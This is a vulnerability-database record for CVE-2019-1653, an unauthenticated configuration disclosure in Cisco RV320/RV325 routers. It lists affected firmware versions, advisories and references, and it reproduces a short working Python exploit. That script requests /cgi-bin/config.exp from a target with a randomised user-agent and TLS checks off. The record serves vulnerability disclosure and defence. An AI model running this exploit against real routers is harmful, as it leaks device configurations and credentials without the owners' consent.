Sign-up

ID

VAR-E-201901-0044


CVE

cve_id:CVE-2019-1653

Trust: 4.3

cve_id:CVE-2019-1652

Trust: 1.8

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46262

EDB ID

46262


TITLE

Cisco RV300 / RV320 - Information Disclosure - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 46262

DESCRIPTION

Cisco RV300 / RV320 - Information Disclosure. CVE-2019-1653 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 46262

AFFECTED PRODUCTS

vendor:ciscomodel:rv320scope: - version: -

Trust: 3.0

vendor:ciscomodel:rv300 rv320scope:eqversion:/

Trust: 2.1

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.17

Trust: 0.6

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.15

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.17

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.15

Trust: 0.6

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:neversion:1.4.2.20

Trust: 0.6

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:neversion:1.4.2.20

Trust: 0.6

vendor:ciscomodel:rv320 rv325 unauthenticatedscope:eqversion:/

Trust: 0.5

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.18

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:eqversion:1.4.2.16

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.18

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:eqversion:1.4.2.16

Trust: 0.3

vendor:ciscomodel:rv325 dual gigabit wan vpn routerscope:neversion:1.4.2.19

Trust: 0.3

vendor:ciscomodel:rv320 dual gigabit wan vpn routerscope:neversion:1.4.2.19

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46262 // EDBNET: 100896

EXPLOIT

# Exploit Title: 6coRV Exploit
# Date: 01-26-2018
# Exploit Author: Harom Ramos [Horus]
# Tested on: Cisco RV300/RV320
# CVE : CVE-2019-1653

import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
from fake_useragent import UserAgent

def random_headers():
return dict({'user-agent': UserAgent().random})

def request(url):
r = requests.Session()
try:
get = r.get(url, headers = random_headers(), timeout = 5, verify=False)#, allow_redirects=False
if get.status_code == 200:
return get.text
except requests.ConnectionError:
return 'Error Conecting'
except requests.Timeout:
return 'Error Timeout'
except KeyboardInterrupt:
raise
except:
return 0

print("")
print("##################################################")
print("CISCO CVE-2019-1653 POC")
print("From H. with love")
print("")

url = raw_input("URL> EX:http://url:port/ ")
url = url + "/cgi-bin/config.exp"
print(request(url))

Trust: 1.0

sources: EXPLOIT-DB: 46262

EXPLOIT LANGUAGE

py

Trust: 0.6

sources: EXPLOIT-DB: 46262

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 46262

TYPE

Information Disclosure

Trust: 1.6

sources: EXPLOIT-DB: 46262 // EDBNET: 100896

TAGS

tag:exploit

Trust: 4.0

tag:web

Trust: 3.5

tag:info disclosure

Trust: 1.0

tag:remote

Trust: 0.5

tag:code execution

Trust: 0.5

sources: PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305

CREDITS

Harom Ramos

Trust: 0.6

sources: EXPLOIT-DB: 46262

EXTERNAL IDS

db:NVDid:CVE-2019-1653

Trust: 4.3

db:NVDid:CVE-2019-1652

Trust: 1.8

db:EXPLOIT-DBid:46262

Trust: 1.6

db:EDBNETid:100896

Trust: 0.6

db:PACKETSTORMid:152261

Trust: 0.5

db:PACKETSTORMid:152262

Trust: 0.5

db:PACKETSTORMid:151313

Trust: 0.5

db:PACKETSTORMid:151374

Trust: 0.5

db:PACKETSTORMid:151311

Trust: 0.5

db:PACKETSTORMid:151312

Trust: 0.5

db:PACKETSTORMid:152260

Trust: 0.5

db:PACKETSTORMid:152305

Trust: 0.5

db:BIDid:106728

Trust: 0.3

db:BIDid:106732

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46262 // EDBNET: 100896

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2019-1653

Trust: 4.0

url:https://nvd.nist.gov/vuln/detail/cve-2019-1652

Trust: 1.5

url:https://software.cisco.com/download/home/284005929/type/282465789/release/1.4.2.20

Trust: 0.6

url:https://software.cisco.com/download/home/284005936/type/282465789/release/1.4.2.20

Trust: 0.6

url:http://www.cisco.com/

Trust: 0.6

url:https://www.exploit-db.com/exploits/46262/

Trust: 0.6

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-inject

Trust: 0.3

url:https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-004/-cisco-rv320-command-injection

Trust: 0.3

url:https://www.redteam-pentesting.de/en/advisories/rt-sa-2018-003/-cisco-rv320-unauthenticated-diagnostic-data-retrieval

Trust: 0.3

url:https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20190123-rv-info

Trust: 0.3

sources: BID: 106728 // BID: 106732 // PACKETSTORM: 152261 // PACKETSTORM: 152262 // PACKETSTORM: 151313 // PACKETSTORM: 151374 // PACKETSTORM: 151311 // PACKETSTORM: 151312 // PACKETSTORM: 152260 // PACKETSTORM: 152305 // EXPLOIT-DB: 46262 // EDBNET: 100896

SOURCES

db:BIDid:106728
db:BIDid:106732
db:PACKETSTORMid:152261
db:PACKETSTORMid:152262
db:PACKETSTORMid:151313
db:PACKETSTORMid:151374
db:PACKETSTORMid:151311
db:PACKETSTORMid:151312
db:PACKETSTORMid:152260
db:PACKETSTORMid:152305
db:EXPLOIT-DBid:46262
db:EDBNETid:100896

LAST UPDATE DATE

2024-03-21T15:09:38.627000+00:00


SOURCES UPDATE DATE

db:BIDid:106728date:2019-01-23T00:00:00
db:BIDid:106732date:2019-01-23T00:00:00

SOURCES RELEASE DATE

db:BIDid:106728date:2019-01-23T00:00:00
db:BIDid:106732date:2019-01-23T00:00:00
db:PACKETSTORMid:152261date:2019-03-27T17:54:50
db:PACKETSTORMid:152262date:2019-03-27T17:55:45
db:PACKETSTORMid:151313date:2019-01-24T16:40:26
db:PACKETSTORMid:151374date:2019-01-29T00:48:50
db:PACKETSTORMid:151311date:2019-01-24T16:37:19
db:PACKETSTORMid:151312date:2019-01-24T16:39:16
db:PACKETSTORMid:152260date:2019-03-27T17:49:07
db:PACKETSTORMid:152305date:2019-03-30T00:52:21
db:EXPLOIT-DBid:46262date:2019-01-28T00:00:00
db:EDBNETid:100896date:2019-02-05T00:00:00